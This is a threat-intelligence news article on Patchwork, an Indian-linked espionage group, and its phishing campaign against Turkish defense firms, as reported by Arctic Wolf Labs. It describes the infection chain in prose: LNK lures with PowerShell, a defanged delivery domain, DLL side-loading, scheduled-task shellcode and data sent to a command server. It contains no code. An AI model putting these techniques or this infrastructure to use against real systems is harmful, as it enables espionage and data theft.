Patchwork APT Targets Turkey’s Defense Sector: Indian Cyber-Espionage Group Seeks Hypersonic & UAV Secrets
The threat group known as Patchwork—also operating under aliases such as APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson—has launched a new targeted phishing campaign aimed at Turkey’s defense sector. According to analysts, the primary objective of the attackers is to obtain sensitive information related to the development of unmanned platforms and hypersonic weaponry.
According to Arctic Wolf Labs, the malicious infection chain consists of five stages and begins with the distribution of Windows LNK shortcut files disguised as invitations to an international conference on unmanned systems. These emails were specifically addressed to personnel working within Turkey’s military-industrial complex, including a manufacturer of precision-guided missile systems.
The geopolitical backdrop lends this campaign particular weight: its timing coincides with deepening military-technical cooperation between Turkey and Pakistan, as well as escalating tensions between Pakistan and India. Analysts note that Patchwork is believed to operate in the interest of the Indian state and has, since 2009, systematically targeted political and military entities across South Asia.
At the beginning of 2025, the same group conducted a campaign against Chinese universities, using documents related to the energy sector as bait. That operation employed a loader written in Rust, which decrypted and executed a C# trojan known as Protego, designed for data exfiltration from infected machines.
In the current attack against Turkish defense institutions, Patchwork again employs LNK files embedded with PowerShell commands. These scripts initiate a connection to a remote server at expouav[.]org—a domain registered on June 25, 2025—which serves as the delivery point for the malicious payload. In addition to the malware, the site hosts a PDF document masquerading as material from a legitimate international conference, ostensibly referencing a real event hosted on the WASET platform. This visual decoy helps distract the user while malicious scripts execute in the background.
Subsequent stages involve the download of a DLL library, which is executed via DLL side-loading—replacing a legitimate component within a trusted process. Execution is triggered by a scheduled task within the Windows Task Scheduler that launches embedded shellcode. This module performs reconnaissance, gathering system metadata, capturing screen images, and transmitting the data to a command-and-control server.
A distinguishing feature of the latest operations is the use of 32-bit PE files in place of the 64-bit DLLs previously observed. This shift indicates an evolution of the group’s technical infrastructure and an effort to enhance stealth: compact x86 binaries are more easily embedded within trusted processes, and the change in architecture complicates automated threat detection.
Researchers also identified infrastructure overlaps between Patchwork and elements previously associated with the DoNot Team (APT-Q-38, Bellyworm), suggesting possible tactical or logistical coordination between the two Indian APT clusters.
This campaign targeting Turkey’s defense sector marks a significant expansion of Patchwork’s operational theater, which had previously focused primarily on South Asia. Given Turkey’s pivotal role in the global UAV market—accounting for roughly 65% of worldwide exports—and its ambitions to advance hypersonic weapons development, the activity of this Indian cyber-espionage group appears to be strategically driven.
